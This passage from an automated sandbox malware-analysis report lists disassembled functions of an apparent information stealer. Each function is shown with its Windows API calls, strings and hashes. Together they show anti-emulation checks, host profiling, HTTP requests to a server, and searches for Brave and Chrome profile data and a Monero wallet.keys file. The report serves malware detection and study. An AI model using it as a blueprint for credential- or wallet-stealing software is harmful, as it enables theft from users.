                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 3404098578-2766056989
                            • Opcode ID: fcd07d3d77c7b6a90c3fa45f3a3ede6d7ef70e96578eda7434880f2cee478508
                            • Instruction ID: 05122bc6f465f4a9e6f6ed5d44015388e016a4a0ec5e8ea33a6045ddd773ba57
                            • Opcode Fuzzy Hash: fcd07d3d77c7b6a90c3fa45f3a3ede6d7ef70e96578eda7434880f2cee478508
                            • Instruction Fuzzy Hash: E2014BB0D40308BAEB10DBE1DC49BAEBF78BB44701F248458E705B7280D7745545879D
                            Function 00576AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1450 576af3 1451 576b0a 1450->1451 1453 576b0c-576b22 call 576920 call 575b10 CloseHandle ExitProcess 1451->1453 1454 576aba-576ad7 call 57aad0 OpenEventA 1451->1454 1460 576af5-576b04 CloseHandle Sleep 1454->1460 1461 576ad9-576af1 call 57aad0 CreateEventA 1454->1461 1460->1451 1461->1453
                            APIs
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E49178,?,0058110C,?,00000000,?,00581110,?,00000000,00580AEF), ref: 00576ACA
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00576AE8
                            • CloseHandle.KERNEL32(00000000), ref: 00576AF9
                            • Sleep.KERNEL32(00001770), ref: 00576B04
                            • CloseHandle.KERNEL32(?,00000000,?,00E49178,?,0058110C,?,00000000,?,00581110,?,00000000,00580AEF), ref: 00576B1A
                            • ExitProcess.KERNEL32 ref: 00576B22
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                            • String ID:
                            • API String ID: 941982115-0
                            • Opcode ID: 50f39c62b087e4da72bcdba3de044bb60e02b75ed7f10b2dd4c7bccc0d5579af
                            • Instruction ID: 69bbf8ec62fc6303f605d5bc4da333c7b5a30a614894c63d79e109f61b4422e9
                            • Opcode Fuzzy Hash: 50f39c62b087e4da72bcdba3de044bb60e02b75ed7f10b2dd4c7bccc0d5579af
                            • Instruction Fuzzy Hash: A8F03A7094061AAEE700ABA0AC0ABBE7E34FB85701F10C914B50EA1181DBB45540EB6A
                            Function 005647B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00564839
                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 00564849
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CrackInternetlstrlen
                            • String ID: <
                            • API String ID: 1274457161-4251816714
                            • Opcode ID: b6314b2760cc3f927598574ea87085d0fafea3c4590c75caca2b0ee15e264120
                            • Instruction ID: f43aa7f5b19d80305fb628c8d2656bd16258f6677126a0e4b1bf892f24f26b79
                            • Opcode Fuzzy Hash: b6314b2760cc3f927598574ea87085d0fafea3c4590c75caca2b0ee15e264120
                            • Instruction Fuzzy Hash: 4F214FB1D00209ABDF14DFA4E849ADE7B75FB45320F108625F929A72C1EB706A05CF82
                            Function 005751F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 0057A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0057A7E6
                              • Part of subcall function 00566280: InternetOpenA.WININET(00580DFE,00000001,00000000,00000000,00000000), ref: 005662E1
                              • Part of subcall function 00566280: StrCmpCA.SHLWAPI(?,00E4EA18), ref: 00566303
                              • Part of subcall function 00566280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00566335
                              • Part of subcall function 00566280: HttpOpenRequestA.WININET(00000000,GET,?,00E4E188,00000000,00000000,00400100,00000000), ref: 00566385
                              • Part of subcall function 00566280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005663BF
                              • Part of subcall function 00566280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005663D1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00575228
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                            • String ID: ERROR$ERROR
                            • API String ID: 3287882509-2579291623
                            • Opcode ID: 3e60d610b90ead0a46bcc4361356f21396023582c2b8eb1d1c481480755e0e2b
                            • Instruction ID: 2a38c351d927fa502d8c067bcabfcc3b06d766998249d6f1a7d444074d861b66
                            • Opcode Fuzzy Hash: 3e60d610b90ead0a46bcc4361356f21396023582c2b8eb1d1c481480755e0e2b
                            • Instruction Fuzzy Hash: AB11FB30910449A7CB14FB74ED5AAED7B38BFD0300F408568B81E5A592EF346B06DB96
                            Function 005778E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00577910
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00577917
                            • GetComputerNameA.KERNEL32(?,00000104), ref: 0057792F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateComputerNameProcess
                            • String ID:
                            • API String ID: 1664310425-0
                            • Opcode ID: 0978c28c4da70863e7b52e72ced1ce945ff315cd1d7baeef107e5a1fd2d4d1ab
                            • Instruction ID: 1dfc6b91286604889f3d4fa3017de27be272b80db873f8b43deff500e3521dd7
                            • Opcode Fuzzy Hash: 0978c28c4da70863e7b52e72ced1ce945ff315cd1d7baeef107e5a1fd2d4d1ab
                            • Instruction Fuzzy Hash: B70186B1904209EBCB00DF94ED45BAABFB8FB45B21F108219FA45E3280C3785904CBA6
                            Function 00561110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0056112B
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 00561132
                            • ExitProcess.KERNEL32 ref: 00561143
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$AllocCurrentExitNumaVirtual
                            • String ID:
                            • API String ID: 1103761159-0
                            • Opcode ID: 59d74488561ec9c3967a03b5e6b5829d3621d291095133ac3cf468a0f871797b
                            • Instruction ID: 0109431862f32df5c965f0e1ecd3d1541527f32c948fd835c88f5b1eb40ea580
                            • Opcode Fuzzy Hash: 59d74488561ec9c3967a03b5e6b5829d3621d291095133ac3cf468a0f871797b
                            • Instruction Fuzzy Hash: 98E0E670945308FFE7516BA09D0EB1D7A78AB45B11F104154F709B71D0D7B92A40D79D
                            Function 005610A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                            Download Yara Rule
                            APIs
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 005610B3
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 005610F7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocFree
                            • String ID:
                            • API String ID: 2087232378-0
                            • Opcode ID: e4f8724f4a8ab5864eedea98dcac253ad1ad4bc500807b9ac0cbb2c055688032
                            • Instruction ID: cf88b2089556dbe46acdea73f092c029ee6cc41e4da00487866d2fc5b89cf761
                            • Opcode Fuzzy Hash: e4f8724f4a8ab5864eedea98dcac253ad1ad4bc500807b9ac0cbb2c055688032
                            • Instruction Fuzzy Hash: FDF0E971641204BBEB1497A4AC4DFBBB7D8E705715F304444F504E3280D6715F00DB55
                            Function 00561190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 005778E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00577910
                              • Part of subcall function 005778E0: RtlAllocateHeap.NTDLL(00000000), ref: 00577917
                              • Part of subcall function 005778E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0057792F
                              • Part of subcall function 00577850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005611B7), ref: 00577880
                              • Part of subcall function 00577850: RtlAllocateHeap.NTDLL(00000000), ref: 00577887
                              • Part of subcall function 00577850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0057789F
                            • ExitProcess.KERNEL32 ref: 005611C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Process$AllocateName$ComputerExitUser
                            • String ID:
                            • API String ID: 3550813701-0
                            • Opcode ID: 48af7db1c5c820ed72ffa296dddd3a98a7bf9ba4501a09d200e066a65f65693c
                            • Instruction ID: edc67b157cbf3907724c70d7b0cbd67c349ca2fc7abad3d9982148c1445e59be
                            • Opcode Fuzzy Hash: 48af7db1c5c820ed72ffa296dddd3a98a7bf9ba4501a09d200e066a65f65693c
                            • Instruction Fuzzy Hash: 96E0ECA595420663CA0077B1BC0EB3A3A9C7B96345F088424BA0993502FA29E810D66E

                            Non-executed Functions

                            Function 005738B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 005738CC
                            • FindFirstFileA.KERNEL32(?,?), ref: 005738E3
                            • lstrcat.KERNEL32(?,?), ref: 00573935
                            • StrCmpCA.SHLWAPI(?,00580F70), ref: 00573947
                            • StrCmpCA.SHLWAPI(?,00580F74), ref: 0057395D
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00573C67
                            • FindClose.KERNEL32(000000FF), ref: 00573C7C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                            • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                            • API String ID: 1125553467-2524465048
                            • Opcode ID: 78de67186c8684c7af00d25403c10c71fbc315da214ebb2ff3661da3c78d465d
                            • Instruction ID: 2f47cc2254c6215c67bfbde24c1f2841ffc77c2b4c7173d2a16d9545ed7dd4b6
                            • Opcode Fuzzy Hash: 78de67186c8684c7af00d25403c10c71fbc315da214ebb2ff3661da3c78d465d
                            • Instruction Fuzzy Hash: 8DA153B2900219ABDB64DF64DC89FFE7778BF89300F048588B60D96141EB749B84DF62
                            Function 0056BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 0057A920: lstrcpy.KERNEL32(00000000,?), ref: 0057A972
                              • Part of subcall function 0057A920: lstrcat.KERNEL32(00000000), ref: 0057A982
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                            • FindFirstFileA.KERNEL32(00000000,?,00580B32,00580B2B,00000000,?,?,?,005813F4,00580B2A), ref: 0056BEF5
                            • StrCmpCA.SHLWAPI(?,005813F8), ref: 0056BF4D
                            • StrCmpCA.SHLWAPI(?,005813FC), ref: 0056BF63
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0056C7BF
                            • FindClose.KERNEL32(000000FF), ref: 0056C7D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                            • API String ID: 3334442632-726946144
                            • Opcode ID: cbdbd8c55c8c4544c1744286e0ad947af745e19cf2962888a06c897f2a84a33f
                            • Instruction ID: bde864809fb1d29fa03d1bb2bd290f1974ff6838c8d4b1a6293fd78776b11f4c
                            • Opcode Fuzzy Hash: cbdbd8c55c8c4544c1744286e0ad947af745e19cf2962888a06c897f2a84a33f
                            • Instruction Fuzzy Hash: 8F424472900105A7CB14FB74EC5AEEE7B7CBBD4300F408558B90AA7191EF34AB49DB96
                            Function 00574910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 0057492C
                            • FindFirstFileA.KERNEL32(?,?), ref: 00574943
                            • StrCmpCA.SHLWAPI(?,00580FDC), ref: 00574971
                            • StrCmpCA.SHLWAPI(?,00580FE0), ref: 00574987
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00574B7D
                            • FindClose.KERNEL32(000000FF), ref: 00574B92
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
